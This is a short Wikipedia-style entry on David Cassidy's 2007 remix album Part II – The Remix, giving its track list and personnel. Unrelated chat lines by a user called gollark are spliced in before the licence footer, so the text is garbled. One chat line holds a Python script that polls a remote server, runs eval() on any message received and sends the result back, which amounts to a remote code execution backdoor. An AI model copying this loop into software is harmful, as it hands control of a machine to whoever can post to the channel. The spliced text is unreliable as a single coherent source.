David Cassidy Part II – The Remix
David Cassidy Part II – The Remix or Dance Party Remix is a dance album from former teen-idol David Cassidy. The album was released in 2007 and is a remixed collection of four of his Billboard singles and seven Partridge Family songs in a club music style (with three versions of Come On, Get Happy).
David Cassidy Part II - The Remix | ||||
---|---|---|---|---|
Remix album by | ||||
Released | 2007 | |||
Genre | Dance, Club music | |||
Label | 180 Music | |||
Producer | Craig J | |||
David Cassidy chronology | ||||
|
The different names attributed to the album is David Cassidy Part II - The Remix was released as a limited edition.
Tracks
- "Come On Get Happy"
- "Come On Get Happy - "GoGo" Remix"
- "I Think I Love You"
- "I'll Meet You Halfway"
- "I Can Feel Your Heartbeat"
- "I Woke Up In Love This Morning"
- "Point Me In The Direction Of Albuquerque"
- "Echo Valley 2-6809"
- "Rock Me Baby"
- "Cherish"
- "Could It Be Forever"
- "Ricky's Tune"
- "Come On Get Happy"
Personnel
- David Cassidy (background vocals)
- Craig J (guitar, programming)
- Cuty Morrison (guitars)
- Robin Simone
- Melissa Pradun
- Joaquina Mitchell
- Beth Glick
- Anny Rusk (background vocals).
gollark: Hmm, idea: what if I make `potatOS.update` just send an event to `potatoupd` instead of actually running the update routines itself?
gollark: Well, OmniDisks are revoked via the web license lookup thing.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```As you can see, this is much more portable than the old SPUDNET Python implementation, which needed websockets and asyncio and such.
gollark: I was thinking about this, but I don't actually have all the hashes of all the disks in circulation.
gollark: It has some great new features now, like long polling mode.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.